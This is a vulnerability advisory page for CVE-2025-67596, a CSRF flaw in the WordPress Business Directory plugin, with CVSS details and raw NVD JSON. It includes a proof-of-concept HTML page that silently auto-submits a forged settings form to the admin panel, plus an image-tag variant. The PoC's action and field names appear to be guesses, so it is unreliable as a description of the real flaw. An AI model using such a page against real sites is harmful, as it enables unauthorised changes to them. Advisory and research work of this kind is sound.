Security Vulnerability Report
中文
CVE-2025-67596 CVSS 4.3 MEDIUM

CVE-2025-67596

Published: 2025-12-09 16:18:38
Last Modified: 2026-04-27 18:16:46

Description

Cross-Site Request Forgery (CSRF) vulnerability in Strategy11 Team Business Directory business-directory-plugin allows Cross Site Request Forgery.This issue affects Business Directory: from n/a through <= 6.4.19.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Business Directory Plugin <= 6.4.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-67596 --> <!-- This PoC demonstrates a CSRF attack on Business Directory plugin --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2025-67596</title> </head> <body> <h1>CSRF PoC for Business Directory Plugin</h1> <p>Click the button below to see the CSRF attack in action.</p> <!-- Malicious form that auto-submits --> <form id="csrfForm" action="[TARGET_SITE]/wp-admin/admin.php" method="POST" style="display:none;"> <!-- Replace with actual vulnerable action --> <input type="hidden" name="page" value="business-directory-admin"> <input type="hidden" name="action" value="bd_save_settings"> <input type="hidden" name="csrf_token" value=""> <input type="hidden" name="directory_options" value="malicious_data"> </form> <script> // Auto-submit form when page loads document.getElementById('csrfForm').submit(); </script> <p>If you see this message, the attack failed.</p> <button onclick="alert('Form submitted!')">Manual Submit</button> </body> </html> <!-- Alternative: Image-based CSRF trigger (no user interaction) --> <!-- <img src="[TARGET_SITE]/wp-admin/admin.php?page=business-directory-admin&action=bd_save_settings" style="display:none;"> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67596", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:18:37.890", "lastModified": "2026-04-27T18:16:46.030", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Strategy11 Team Business Directory business-directory-plugin allows Cross Site Request Forgery.This issue affects Business Directory: from n/a through <= 6.4.19."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/business-directory-plugin/vulnerability/wordpress-business-directory-plugin-6-4-19-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}